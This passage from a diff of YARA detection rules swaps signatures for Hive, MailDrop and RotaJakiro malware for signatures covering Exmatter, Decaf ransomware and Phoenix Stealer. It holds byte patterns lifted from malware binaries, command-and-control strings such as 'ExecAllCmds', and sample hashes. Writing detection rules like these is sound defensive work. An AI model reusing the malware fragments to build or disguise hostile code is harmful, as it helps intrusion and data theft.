00 e8 84 7d 6f 00 4c 8d 05 65 9c 79 00 48 8d 55 f0 48 8d 4c 24 58 e8 c3 98 6f 00 85 c0 0f 85 af 00 00 00 48 8b 4c 24 58 44 8d 40 02 33 d2 e8 db aa 6f 00 48 8b 4c 24 58 e8 71 94 6f 00 48 8b 4c 24 58 45 33 c0 33 d2 48 63 d8 e8 bf aa 6f 00 8d 4b 01 48 63 c9 e8 d4 67 6f 00 4c 8b 4c 24 58 4c 8b c3 ba 01 00 00 00 48 8b c8 48 8b f0 e8 58 f5 6f 00 48 8b 4c 24 58 48 8b d8 e8 47 99 6f 00 b9 64 00 00 00 ff 15 08 8f 71 00 48 83 bf f0 03 00 00 00 75 11 b9 42 6e aa cf e8 8c e7 ff ff 48 89 87 f0 03 00 00 48 8d 4d f0 ff 97 f0 03 00 00 44 8b cb 89 5c 24 50 4c 8b c6 48 8d 54 24 50 49 8b ce e8 44 d7 5c 00 48 8b ce 85 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 20KB and 3 of ( $s* )
+		uint16( 0 ) == 0x5A4D and filesize > 500KB and all of ( $s* )
 }
-rule ARKBIRD_SOLG_RAN_ELF_Hive_Oct_2021_1 : FILE
+rule ARKBIRD_SOLG_EXF_Exmatter_Nov_2021_1 : FILE
 {
 	meta:
-		description = "Detect ELF version of Hive ransomware"
+		description = "Detect packed Exmatter with Confuser"
 		author = "Arkbird_SOLG"
-		id = "434cfe85-3209-5990-9c68-47ce4fafd5b8"
-		date = "2021-10-29"
-		modified = "2021-10-30"
-		reference = "https://twitter.com/ESETresearch/status/1454100591261667329"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-10-29/Hive/RAN_ELF_Hive_Oct_2021_1.yara#L1-L19"
+		id = "ddae7776-3202-50e6-b8af-0e5d15373386"
+		date = "2021-11-01"
+		modified = "2021-11-01"
+		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackmatter-data-exfiltration"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-01/Exmatter/EXF_Exmatter_Nov_2021_1.yara#L1-L22"
 		license_url = "N/A"
-		logic_hash = "47ccf3b825521986070dba92194d5937289c0335b922537ea3242c4afb2be237"
-		score = 60
-		quality = 35
+		logic_hash = "67aaac3db488a9e28897047a7498b7a447ec63cdb6da82cb3d4217c7d615f176"
+		score = 50
+		quality = 75
 		tags = "FILE"
-		hash1 = "6a0449a0b92dc1b17da219492487de824e86a25284f21e6e3af056fe3f4c4ec0"
-		hash2 = "bdf3d5f4f1b7c90dfc526340e917da9e188f04238e772049b2a97b4f88f711e3"
+		hash1 = "b6bc126526e27c98a94aab16989864161db1b3a75f18bd5c72bacbdfccad7bd7"
+		hash2 = "8eded48c166f50be5ac33be4b010b09f911ffc155a3ab76821e4febd369d17ef"
+		hash3 = "325ecd90ce19dd8d184ffe7dfb01b0dd02a77e9eabcb587f3738bcfbd3f832a1"
+		level = "Experimental"
 		tlp = "white"
-		adversary = "-"
-		level = "experimental"
+		adversary = "RaaS"
 
 	strings:
-		$s1 = { 49 3b 66 10 76 ?? 48 83 ec ?? 48 89 6c 24 ?? 48 8d 6c 24 ?? 48 8b [3] 48 }
-		$s2 = { 48 89 f8 48 89 f3 48 83 ec 27 48 83 e4 f0 48 89 44 24 10 48 89 5c 24 18 48 8d 3d 41 [2] 00 48 8d 9c 24 68 00 ff ff 48 89 5f 10 48 89 5f 18 48 89 1f 48 89 67 08 b8 00 00 00 00 0f a2 89 c6 83 f8 00 74 33 81 fb 47 65 6e 75 75 1e 81 fa 69 6e 65 49 75 16 81 f9 6e 74 65 6c 75 0e c6 05 [3] 00 01 c6 05 [3] 00 01 b8 01 00 00 00 0f a2 89 05 [3] 00 48 8b 05 }
-		$s3 = { 66 0f 38 dc ?? 66 0f 38 dc ?? 66 0f 38 dc ?? 66 0f 38 dc ?? 66 0f 38 dc ?? 66 0f 38 dc }
-		$s4 = { 00 00 48 8b ac 24 68 02 00 00 48 81 c4 70 02 00 00 c3 ?? 80 ?? 0e [6] 48 8b [2] 48 }
+		$s1 = { 45 38 42 44 32 35 45 33 46 35 33 34 39 39 41 43 31 39 42 44 42 34 31 45 37 36 45 38 36 38 39 37 38 39 31 31 42 43 35 41 44 46 37 36 34 33 31 38 33 45 34 38 36 33 38 32 42 44 33 42 42 44 30 30 00 35 41 41 34 30 37 35 37 33 42 34 43 36 45 43 43 41 45 35 36 44 30 46 35 43 34 33 35 34 36 32 33 39 38 43 30 41 46 42 35 33 46 36 44 36 32 33 31 44 38 39 34 44 34 44 31 41 37 46 44 36 45 30 30 00 42 33 39 46 43 34 39 41 36 31 35 36 45 37 31 35 45 38 42 39 37 41 35 30 46 44 34 35 46 45 34 36 38 37 30 37 38 44 42 44 31 45 45 43 46 46 44 39 46 38 35 31 34 30 42 35 33 31 36 45 39 32 31 30 00 44 33 30 39 45 32 43 32 30 31 43 37 35 43 43 30 38 43 35 33 36 42 41 34 30 32 31 45 41 35 37 43 45 42 34 44 30 34 34 39 32 36 30 31 36 46 46 39 39 46 45 44 45 36 31 35 34 36 31 30 41 32 31 30 00 36 43 37 35 38 36 33 43 32 46 39 38 44 37 46 41 45 33 36 45 37 44 46 43 45 38 46 31 39 45 43 39 35 41 46 30 30 43 43 42 33 44 43 39 39 39 31 38 46 42 38 43 30 42 35 38 39 42 30 42 34 35 31 30 }
+		$s2 = { 33 44 33 32 31 41 45 42 34 33 39 35 36 30 34 38 46 35 43 37 35 41 38 42 38 36 36 35 32 34 33 34 44 31 33 31 30 31 31 32 45 37 44 36 42 37 38 46 42 37 35 44 39 33 35 36 31 44 31 31 30 39 38 31 00 34 39 44 38 32 36 38 33 30 42 35 44 39 32 30 34 34 38 46 37 34 42 42 42 45 44 42 33 36 31 46 31 37 43 39 44 44 34 36 31 45 30 44 43 33 44 45 44 31 31 34 45 36 45 31 33 45 30 31 37 33 39 38 31 00 31 45 42 30 38 30 36 38 33 30 39 37 41 32 37 46 42 37 34 33 46 36 32 44 30 38 33 38 44 34 42 41 36 34 33 35 46 44 43 33 38 38 32 41 36 41 36 37 45 46 42 43 32 32 34 45 37 31 42 44 42 43 38 31 00 46 39 45 39 31 44 44 39 44 32 36 32 38 43 43 32 39 32 42 41 43 32 36 35 39 41 35 35 34 34 42 38 42 46 42 30 41 44 31 46 38 31 30 30 43 37 35 45 38 32 44 44 33 42 32 43 45 44 30 35 43 37 39 31 00 45 44 44 31 45 32 34 31 37 36 33 46 34 33 33 35 30 38 37 42 39 38 41 44 30 37 35 38 44 36 39 33 31 39 32 42 37 37 45 44 37 32 41 39 36 43 38 42 33 35 41 45 31 39 34 41 45 38 45 39 31 41 39 31 00 38 43 46 31 34 42 43 33 42 46 39 44 36 31 30 30 43 41 38 41 }
+		$s3 = "SSH_MSG_NEWKEYS" ascii
+		$s4 = { 35 45 46 32 31 35 39 31 38 33 32 30 41 44 38 41 46 41 41 30 32 35 33 35 35 34 36 46 34 34 33 43 38 44 30 39 46 30 41 44 35 31 33 37 45 35 32 30 33 34 32 38 38 43 37 36 39 41 43 36 42 41 44 46 00 44 36 32 45 45 38 34 39 37 41 45 34 39 35 41 33 31 31 34 35 41 37 37 41 35 43 39 44 35 35 37 30 34 43 30 38 38 33 42 30 31 35 46 45 31 41 45 39 46 44 46 46 45 32 30 38 46 31 33 46 41 45 44 46 00 31 35 32 30 33 33 46 38 33 46 37 46 41 36 36 34 35 31 39 33 42 33 32 32 43 43 42 31 36 37 32 46 30 38 39 35 36 42 36 38 43 33 38 44 31 33 32 46 32 32 37 38 46 43 46 30 46 41 30 34 44 46 45 46 00 33 41 33 36 41 46 34 41 46 30 41 31 46 45 35 37 39 35 44 42 39 39 46 41 38 44 33 39 34 46 41 32 44 38 39 30 41 32 32 35 32 38 30 41 38 41 31 35 39 41 43 37 39 46 31 45 34 38 45 45 31 38 46 46 00 44 43 37 42 45 38 33 42 33 45 46 46 38 31 45 38 43 39 45 30 36 46 37 44 37 43 31 46 34 42 44 37 33 34 46 32 30 32 30 41 34 32 34 32 39 45 32 32 41 32 36 31 42 30 45 45 45 31 36 44 31 39 46 46 }
+		$s5 = { 39 38 41 43 30 38 30 44 38 38 37 45 31 34 43 43 39 32 32 44 34 35 37 43 33 42 31 30 35 35 37 31 45 33 36 41 37 35 43 43 39 31 31 42 33 35 46 36 30 43 32 46 35 30 36 44 44 44 45 43 35 43 41 46 00 31 33 46 33 37 31 33 43 30 38 42 33 30 43 45 34 37 36 35 37 33 45 43 31 38 32 39 30 31 32 35 30 45 39 36 42 34 37 37 35 33 31 39 46 34 36 41 38 41 30 30 41 34 46 31 45 42 38 41 43 35 32 42 46 00 43 39 38 39 33 42 41 33 46 43 31 46 41 39 41 37 43 38 37 33 42 32 37 38 37 41 41 41 44 38 38 39 45 33 38 46 30 43 33 39 36 39 45 37 41 32 37 42 30 44 33 37 45 30 41 }
+		$s6 = "SSH_MSG_KEX_DH_GEX_INIT" ascii
 
 	condition:
-		uint32( 0 ) == 0x464C457F and filesize > 20KB and all of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 600KB and 5 of them
 }
-rule ARKBIRD_SOLG_APT_APT_34_Maildrop_Mar_2021_1 : FILE
+rule ARKBIRD_SOLG_RAN_Decaf_Nov_2021_1 : FILE
 {
 	meta:
-		description = "Detect MailDrop malware used by APT34"
+		description = "Detect Decaf ransomware (unpacked UPX)"
 		author = "Arkbird_SOLG"
-		id = "a17c4e0b-9bbb-594d-8551-5c146e6a601e"
-		date = "2021-04-03"
-		modified = "2021-04-09"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-04-03/APT34/APT_APT_34_MailDrop_Mar_2021_1.yar#L1-L24"
+		id = "d19b2d31-a6c5-5033-ba43-4e9ccabc37bb"
+		date = "2021-11-01"
+		modified = "2021-11-02"
+		reference = "https://blog.morphisec.com/decaf-ransomware-a-new-golang-threat-makes-its-appearance"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-01/Decaf/RAN_Decaf_Nov_2021_1.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "f55192044bf8e190dfdc18aeaac543a5022643ea242e75ff2492939ae6e1814c"
+		logic_hash = "5cea33d710d252b39bcd8ae227f52d10897b7fe58b1ff5226a1cb8cc094d600c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "d6b876d72dba94fc0bacbe1cb45aba493e4b71572a7713a1a0ae844609a72504"
-		hash2 = "ebae23be2e24139245cc32ceda4b05c77ba393442482109cc69a6cecc6ad1393"
+		hash1 = "088b4715bbe986deac972d551b88f178d43b191f5a71fbd4db3fb0810a233500"
+		hash2 = "5da2a2ebe9959e6ac21683a8950055309eb34544962c02ed564e0deaf83c9477"
+		tlp = "white"
+		adversary = "-"
 
 	strings:
-		$EWSInitCom = { 7e ?? 00 00 04 28 ?? 00 00 06 ?? 4f [0-3] 02 7b ?? 00 00 04 28 ?? 00 00 06 28 ?? 00 00 06 02 7b ?? 00 00 04 6f ?? 00 00 06 02 7b ?? 00 00 04 28 ?? 00 00 06 72 ?? 00 00 70 28 ?? 00 00 0a 28 ?? 00 00 06 02 7b ?? 00 00 04 6f ?? 00 00 06 7e ?? 00 00 04 72 ?? 00 00 70 28 ?? 00 00 06 7e 06 00 00 04 28 ?? 00 00 06 [2-4] 00 00 [3-4] 00 00 [3] 00 00 [3] 00 00 [3] 00 00 }
-		$EWSCom = { 13 30 ?? 00 ?? 00 00 00 00 00 00 00 02 28 ?? 00 00 ?? 02 03 05 0e 04 0e 05 0e 06 [0-4] 73 ?? 00 00 06 7d ?? 00 00 04 04 [2-6] 00 00 ?? 02 ?? 7d ?? 00 00 04 [0-2] 02 ?? 7d ?? 00 00 04 [2-4] 00 00 [0-18] 04 02 28 ?? 00 00 06 2a }
-		$EWSDecrypt = { 13 30 03 00 27 00 00 00 ?? 00 00 11 0f 00 20 00 01 00 00 16 28 ?? 00 00 06 28 ?? 00 00 06 0a 0f 00 1f 10 16 28 ?? 00 00 06 0b 02 06 07 28 ?? 00 00 06 2a }
-		$EWSRandomData = { 1b 30 ?? 00 ?? 00 00 00 ?? 00 00 11 02 19 28 ?? 00 00 0a 0a 16 0b ?? 35 [0-3] 06 16 6a 16 6f ?? 00 00 0a 26 06 6f ?? 00 00 0a d4 8d ?? 00 00 01 0c 7e ?? 00 00 04 08 6f ?? 00 00 0a 06 08 16 06 6f ?? 00 00 0a b7 6f ?? 00 00 0a 07 17 d6 0b 07 1f 32 32 c6 [5-11] 06 6f ?? 00 00 0a dc 2a [0-1] 01 10 00 00 02 00 08 00 }
-		$s1 = "HMicrosoft Office/15.0 (Windows NT {0}; Microsoft Outlook 15.0.4675; Pro)" fullword ascii
-		$s2 = "https://{0}/ews/exchange.asmx" fullword wide
-		$s3 = "Send_Log" fullword ascii
-		$s4 = "CheckEWSConnection" fullword ascii
-		$s5 = "Done:D" fullword wide
-		$s6 = "ExecAllCmds" fullword ascii
-		$s7 = "ExchangeUri" fullword ascii
-		$s8 = "get_cmdSubject" fullword ascii
+		$s1 = { 48 8b 05 [3] 00 48 8b 0d [3] 00 48 8d 54 24 ?? 8b 5c 24 ?? 48 8d 74 24 ?? 48 89 0c 24 48 89 44 24 08 48 89 54 24 10 48 89 5c 24 18 48 89 74 24 20 89 f8 48 89 44 24 28 48 c7 44 24 30 00 00 00 00 e8 [2] 00 00 45 0f 57 ff 65 4c 8b 34 25 28 00 00 00 4d 8b b6 00 00 00 00 48 83 7c 24 38 00 74 ?? 48 8b 54 24 ?? c6 82 e5 00 00 00 00 48 8b 54 24 ?? 31 c0 }
+		$s2 = { 48 8b 05 [3] 00 48 8b 0d [3] 00 48 89 0c 24 48 89 44 24 08 44 0f 11 7c 24 10 48 c7 44 24 20 00 00 00 00 e8 [2] 00 00 45 0f 57 ff 65 4c 8b 34 25 28 00 00 00 4d 8b b6 00 00 00 00 48 83 7c 24 28 00 74 0a 48 8b 6c 24 ?? 48 83 c4 ?? c3 e8 [3] 00 45 0f 57 ff 65 4c 8b 34 25 28 00 00 00 4d 8b b6 00 00 00 00 }
+		$s3 = { 48 83 ec 48 48 89 6c 24 40 48 8d 6c 24 40 48 89 44 24 50 48 89 5c 24 58 48 83 3d [3] 00 00 75 73 48 8b 05 45 [2] 00 48 8d 0d 66 [2] 00 48 89 04 24 48 89 4c 24 08 48 c7 44 24 10 04 01 00 00 e8 [2] 00 00 45 0f 57 ff 65 4c 8b 34 25 28 00 00 00 4d 8b b6 00 00 00 00 48 8b 44 24 18 48 85 c0 0f 84 6a 01 00 00 48 3d 04 01 00 00 0f 87 5e 01 00 00 48 8d 1d 1a [2] 00 c6 04 03 5c 4c 8d 40 01 4c 89 05 [3] 00 48 8b 44 24 50 48 8b 5c }
+		$s4 = { 48 89 44 24 40 c7 44 24 3c 00 00 00 00 48 8b 0d [3] 00 48 8d 54 24 3c 48 89 0c 24 48 89 44 24 08 48 89 54 24 10 e8 [2] 00 00 45 0f 57 ff 65 4c 8b 34 25 28 00 00 00 4d 8b b6 00 00 00 00 48 83 7c 24 18 00 75 10 48 8b 44 24 40 8b 4c 24 68 48 8b 5c 24 60 eb 1d 48 8b 44 24 40 48 8b 5c 24 60 8b 4c 24 68 e8 8f 00 00 00 48 8b 6c 24 48 48 83 c4 50 c3 c7 44 24 38 00 00 00 00 48 8b 15 [3] 00 48 8d 74 24 38 48 89 14 24 48 89 44 24 08 48 89 5c 24 10 48 63 c1 48 89 44 24 18 48 89 74 24 20 48 c7 44 24 28 00 00 00 00 e8 }
+		$s5 = { 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 49 42 43 67 4b 43 41 51 45 41 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 20KB and 2 of ( $EWS* ) and 5 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 400KB and 4 of them
 }
-rule ARKBIRD_SOLG_MAL_ELF_Rotajakiro_May_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Phoenix_Stealer_Jun_2021_1 : FILE
 {
 	meta:
-		description = "Detect the ELF version of RotaJakiro"
+		description = "Detect the Phoenix Stealer"
 		author = "Arkbird_SOLG"
-		id = "a67f9b64-8778-542f-8481-566a4ffaf5e8"
-		date = "2020-05-07"
-		modified = "2021-05-08"
-		reference = "https://blog.netlab.360.com/rotajakiro_linux_version_of_oceanlotus/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-08/RotaJakiro/MAL_ELF_RotaJakiro_May_2021_1.yara#L1-L21"
+		id = "8c9df216-cbfe-51f3-a6d7-cfeb99fafbe0"
+		date = "2021-11-01"
+		modified = "2021-11-01"
+		reference = "https://twitter.com/3xp0rtblog/status/1455111070566207493/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-01/Phoenix_Stealer/MAL_Phoenix_Stealer_Jun_2021_1.yara#L1-L20"
 		license_url = "N/A"
-		logic_hash = "8e4b9ef8a908a13e738da31b28c879228c3bdc1d8461417b1c1bf31026c98abf"
+		logic_hash = "989c2518a42201559265ce4b974b35df5c4b8365e53f789fc124ee969e747c87"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "0958e1f4c3d14e4de380bda4c5648ab4fa4459ef8f5daaf32bb5f3420217af32"
-		hash2 = "5d753e72ef89f1cef3b7007df812c7a504727816a7b91ecd75cc9acdfb7e9c2e"
-		hash3 = "a18bec90b2b6185362eeb67c516c82dd34cd8f6a7423875921572e97ae1668b0"
-		hash4 = "af2a2be20d7bbec0a9bb4a4dfa898aa18ef4994a9791d7cf37b7b62b379992ac"
-		hash5 = "d38e8f113c36cfa9e05c4d0d6b526d81b69039430c3b1fc64a08a3445b5a5abe"
+		hash1 = "5bbfeee67b9b087ed228eccdacd4a7e71d40f7f96ad869903e02d9c3b02adbe5"
+		hash2 = "34f78f4028c51f6340c1f4846b65252fa6686ba0a5ab8ebc35c737a8960ba43e"
+		hash3 = "e51de8c43034fafaa49f81e9cc955c0cf60dc9684f28d8c355baf0724710de1f"
 		tlp = "White"
-		adversary = "Oceanlotus"
+		adversary = "-"
 
 	strings:
-		$seq1 = { 41 57 41 56 41 55 41 54 41 89 f5 55 53 49 89 fc 48 83 ec 58 64 48 8b 04 25 28 00 00 00 48 89 44 24 48 31 c0 e8 77 60 ff ff 89 c7 e8 20 60 ff ff 48 8b 58 20 c6 44 24 10 85 48 8d 7c 24 10 c6 44 24 11 2d c6 44 24 12 c5 ba 22 00 00 00 c6 44 24 13 7a c6 44 24 14 02 be 30 00 00 00 c6 44 24 15 58 c6 44 24 16 30 c6 44 24 17 e4 c6 44 24 18 8a c6 44 24 19 37 c6 44 24 1a bd c6 44 24 1b 68 c6 44 24 1c f6 c6 44 24 1d f8 c6 44 24 1e 6c c6 44 24 1f 8c c6 44 24 20 97 c6 44 24 21 cb c6 44 24 22 73 c6 44 24 23 bd c6 44 24 24 7b c6 44 24 25 19 c6 44 24 26 93 c6 44 24 27 a0 c6 44 24 28 26 c6 44 24 29 26 c6 44 24 2a ae c6 44 24 2b 1c c6 44 24 2c 96 c6 44 24 2d 1d c6 44 24 2e 0f c6 44 24 2f be 44 8b 05 b6 7c 21 00 48 8b 0d b7 7c 21 00 c6 44 24 30 b2 c6 44 24 31 7d c6 44 24 32 48 c6 44 24 33 b9 c6 44 24 34 b6 c6 44 24 35 a4 c6 44 24 36 30 c6 44 24 37 43 c6 44 24 38 06 c6 44 24 39 e3 c6 44 24 3a 4f c6 44 24 3b 06 c6 44 24 3c f5 c6 44 24 3d 87 c6 44 24 3e d5 c6 44 24 3f 6a e8 3a 71 ff ff 48 89 df 48 89 c6 48 89 c5 e8 bc 6c ff ff 45 85 ed 48 89 c3 0f 85 a0 00 00 00 48 89 df e8 58 6e ff ff 85 c0 0f 84 30 01 00 00 8b 05 2a 7c 21 00 48 c7 44 24 08 00 00 00 00 48 83 ec 08 c7 44 24 0c 00 00 00 00 4c 8b 0d 16 7c 21 00 ba 2a 00 00 00 4c 89 e6 bf 01 00 00 00 50 4c 8d 44 24 14 48 8d 4c 24 18 e8 b1 71 ff ff 85 c0 5a }
-		$seq2 = { 41 54 41 b8 08 00 00 00 55 53 b9 00 f3 61 00 ba 42 00 00 00 49 89 fd 49 89 f4 48 83 ec 68 be 50 00 00 00 48 89 e7 c6 04 24 bf c6 44 24 01 cf 64 48 8b 04 25 28 00 00 00 48 89 44 24 58 31 c0 c6 44 24 02 c6 c6 44 24 03 a1 c6 44 24 04 20 c6 44 24 05 76 c6 44 24 06 5d c6 44 24 07 e5 c6 44 24 08 ec c6 44 24 09 87 c6 44 24 0a 45 c6 44 24 0b 26 c6 44 24 0c e1 c6 44 24 0d c8 c6 44 24 0e 8e c6 44 24 0f c0 c6 44 24 10 89 c6 44 24 11 d2 c6 44 24 12 ac c6 44 24 13 c1 c6 44 24 14 01 c6 44 24 15 08 c6 44 24 16 ac c6 44 24 17 8e c6 44 24 18 52 c6 44 24 19 65 c6 44 24 1a c9 c6 44 24 1b 06 c6 44 24 1c be c6 44 24 1d 82 c6 44 24 1e ef c6 44 24 1f 85 c6 44 24 20 9f c6 44 24 21 96 c6 44 24 22 fa c6 44 24 23 65 c6 44 24 24 50 c6 44 24 25 dd c6 44 24 26 0e c6 44 24 27 e0 c6 44 24 28 87 c6 44 24 29 ba c6 44 24 2a 27 c6 44 24 2b f8 c6 44 24 2c ef c6 44 24 2d 5c c6 44 24 2e 60 c6 44 24 2f 07 c6 44 24 30 b1 c6 44 24 31 c5 c6 44 24 32 3d c6 44 24 33 81 c6 44 24 34 df c6 44 24 35 87 c6 44 24 36 64 c6 44 24 37 01 c6 44 24 38 04 c6 44 24 39 9b c6 44 24 3a f9 c6 44 24 3b da c6 44 24 3c 28 c6 44 24 3d f1 c6 44 24 3e 30 c6 44 24 3f cb c6 44 24 40 c8 c6 44 24 41 48 c6 44 24 42 43 c6 44 24 43 e6 c6 44 24 44 e5 c6 44 24 45 f3 c6 44 24 46 c9 c6 44 24 47 8b c6 44 24 48 3c c6 44 24 49 a7 c6 44 24 4a 8b c6 44 24 4b 48 c6 44 24 4c 54 c6 44 24 4d 13 c6 44 24 4e 2b c6 44 24 4f bb e8 a4 aa ff ff bf 00 04 00 00 48 89 c5 e8 77 9a ff ff be 00 04 00 00 48 89 c3 48 89 c7 e8 37 9b ff ff 4c 89 ea 48 }
-		$seq3 = { 48 8d 7c 24 10 c6 44 24 10 fb c6 44 24 11 d0 64 48 8b 04 25 28 00 00 00 48 89 84 24 08 01 00 00 31 c0 c6 44 24 12 8d c6 44 24 13 ac c6 44 24 14 db c6 44 24 15 79 c6 44 24 16 84 c6 44 24 17 52 c6 44 24 18 44 c6 44 24 19 46 c6 44 24 1a 6c c6 44 24 1b d1 c6 44 24 1c ac c6 44 24 1d 31 c6 44 24 1e ca c6 44 24 1f 18 c6 44 24 20 18 c6 44 24 21 90 c6 44 24 22 ec c6 44 24 23 8f c6 44 24 24 a1 c6 44 24 25 74 c6 44 24 26 a8 c6 44 24 27 9a c6 44 24 28 53 c6 44 24 29 d4 c6 44 24 2a a4 c6 44 24 2b 5b c6 44 24 2c 68 c6 44 24 2d c8 c6 44 24 2e dd c6 44 24 2f a5 e8 18 a9 ff ff 48 89 c7 49 89 c5 e8 4d a6 ff ff 83 f8 01 74 40 31 db 4d 85 ed 74 08 4c 89 ef e8 b9 95 ff ff 48 8b 8c 24 08 01 00 00 64 48 33 }
-		$seq4 = { ba 15 00 00 00 be 20 00 00 00 c6 44 24 30 b1 c6 44 24 31 be c6 44 24 32 54 c6 44 24 33 93 c6 44 24 34 29 c6 44 24 35 67 c6 44 24 36 1f c6 44 24 37 b5 c6 44 24 38 a5 c6 44 24 39 ec c6 44 24 3a 18 c6 44 24 3b 53 c6 44 24 3c f0 c6 44 24 3d f1 c6 44 24 3e fe c6 44 24 3f 9f c6 44 24 40 27 c6 44 24 41 8f c6 44 24 42 8d c6 44 24 43 77 c6 44 24 44 1e c6 44 24 45 e1 c6 44 24 46 e1 c6 44 24 47 f0 c6 44 24 48 9e c6 44 24 49 e2 c6 44 24 4a 0d c6 44 24 4b 96 c6 44 24 4c ff c6 44 24 4d 6c c6 44 24 4e b4 c6 44 24 4f 16 e8 09 a8 ff ff 4c 89 ef 48 89 c6 49 89 c4 e8 8b a3 ff ff 48 8d bc 24 90 00 00 00 41 b8 08 00 00 00 b9 00 f3 61 00 ba 69 00 00 00 be 70 00 00 00 48 89 04 24 c6 84 24 90 00 00 00 b3 c6 84 24 91 00 00 00 0b c6 84 24 92 00 00 00 18 c6 84 24 93 00 00 00 fd c6 84 24 94 00 00 00 71 c6 84 24 95 00 00 00 3b c6 84 24 96 00 00 00 b7 c6 84 24 97 00 00 00 fc c6 84 24 98 00 00 00 70 c6 84 24 99 00 00 00 18 c6 84 24 9a 00 00 00 f7 c6 84 24 9b 00 00 00 22 c6 84 24 9c 00 00 00 2d c6 84 24 9d 00 00 00 75 c6 84 24 9e 00 00 00 5d c6 84 24 9f 00 00 00 8f c6 84 24 a0 00 00 00 75 c6 84 24 a1 00 00 00 60 c6 84 24 a2 00 00 00 91 c6 84 24 a3 00 00 00 b3 c6 84 24 a4 00 00 00 1a c6 84 24 a5 00 00 00 0b c6 84 24 a6 00 00 00 00 c6 84 24 a7 00 00 00 5c c6 84 24 a8 00 00 00 6b c6 84 24 a9 00 00 00 8d c6 84 24 aa 00 00 00 ee c6 84 24 ab 00 00 00 3b c6 84 24 ac 00 00 00 7e c6 84 24 ad 00 00 00 67 c6 84 24 ae 00 00 00 72 c6 84 24 af 00 00 00 43 c6 84 24 b0 00 00 00 f6 c6 84 24 b1 00 00 00 14 c6 84 24 b2 00 00 00 32 c6 84 24 b3 00 00 00 c1 c6 84 24 b4 00 00 00 79 c6 84 24 b5 00 00 00 0d c6 84 24 b6 00 00 00 0d c6 84 24 b7 00 00 00 22 c6 84 24 b8 00 00 00 e1 c6 84 24 b9 00 00 00 bd c6 84 24 ba 00 00 00 3f c6 84 24 bb 00 00 00 82 c6 84 24 bc 00 00 00 dd c6 84 24 bd 00 00 00 23 c6 84 24 be 00 00 00 7d c6 84 24 bf 00 00 00 87 c6 84 24 c0 00 00 00 34 c6 84 24 c1 00 00 00 9d c6 84 24 c2 00 00 00 43 c6 84 24 c3 00 00 00 98 c6 84 24 c4 00 00 00 da c6 84 24 c5 00 00 00 e0 c6 84 24 c6 00 00 00 3d c6 84 24 c7 00 00 00 64 c6 84 24 c8 00 00 00 1a c6 84 24 c9 00 00 00 d7 c6 84 24 ca 00 00 00 f5 c6 84 24 cb 00 00 00 5a c6 84 24 cc 00 00 00 c3 c6 84 24 cd 00 00 00 9c c6 84 24 ce 00 00 00 97 c6 84 24 cf 00 00 00 c7 c6 84 24 d0 00 00 00 65 c6 84 24 d1 00 00 00 8f c6 84 24 d2 00 00 00 99 c6 84 24 d3 00 00 00 eb c6 84 24 d4 00 00 00 2f c6 84 24 d5 00 00 00 2b c6 84 24 d6 00 00 00 d0 c6 84 24 d7 00 00 00 d9 c6 84 24 d8 00 00 00 4e c6 84 24 d9 00 00 00 8f c6 84 24 da 00 00 00 7b c6 84 24 db 00 00 00 97 c6 84 24 dc 00 00 00 3b c6 84 24 dd 00 00 00 14 c6 84 24 de 00 00 00 e9 c6 84 24 df 00 00 00 e9 c6 84 24 e0 00 00 00 82 c6 84 24 e1 00 00 00 48 c6 84 24 e2 00 00 00 dc c6 84 24 e3 00 00 00 a3 c6 84 24 e4 00 00 00 75 c6 84 24 e5 00 00 00 ca c6 84 24 e6 00 00 00 e6 c6 84 24 e7 00 00 00 40 c6 84 24 e8 00 00 00 6b c6 84 24 e9 00 00 00 b1 c6 84 24 ea 00 00 00 68 c6 84 24 eb 00 00 00 42 c6 84 24 ec 00 00 00 56 c6 84 24 ed 00 00 00 b4 c6 84 24 ee 00 00 00 ac c6 84 24 ef 00 00 00 2a c6 84 24 f0 00 00 00 fc c6 84 24 f1 00 00 00 34 c6 84 24 f2 00 00 00 fa c6 84 24 f3 00 00 00 1d c6 84 24 f4 00 00 00 1b c6 84 24 f5 00 00 00 9a c6 84 24 f6 00 00 00 62 c6 84 24 f7 00 00 00 b3 c6 84 24 f8 00 00 00 39 c6 84 24 f9 00 00 00 6a c6 84 24 fa 00 00 00 19 c6 84 24 fb 00 00 00 1b c6 84 24 fc 00 00 00 f3 c6 84 24 fd 00 00 00 c5 c6 84 24 fe 00 00 00 d2 c6 84 24 ff 00 00 00 6a e8 55 a4 ff ff 48 89 c7 48 89 c5 e8 4a 92 ff ff 44 8d 7c 03 0a 4d 63 ff 4c 89 ff e8 1a 94 ff ff 4c 89 fe 48 89 c3 48 89 c7 e8 dc 94 ff ff 4c 89 f2 48 89 ee 48 89 df 31 c0 e8 2c 95 ff ff 48 89 da 8b 0a 48 83 c2 04 8d 81 ff fe fe fe f7 d1 21 c8 25 80 80 80 80 74 e9 89 c1 4c 8b 3c 24 48 89 de c1 e9 10 a9 80 80 00 00 0f 44 c1 48 8d 4a 02 4c 89 ff 48 0f 44 d1 89 c1 00 c1 48 83 da 03 48 29 da e8 93 a8 ff ff 4c 89 ff be ed 01 00 00 4c 89 3c 24 e8 d2 aa ff ff 48 8d 44 24 50 41 b8 08 00 00 00 b9 00 f3 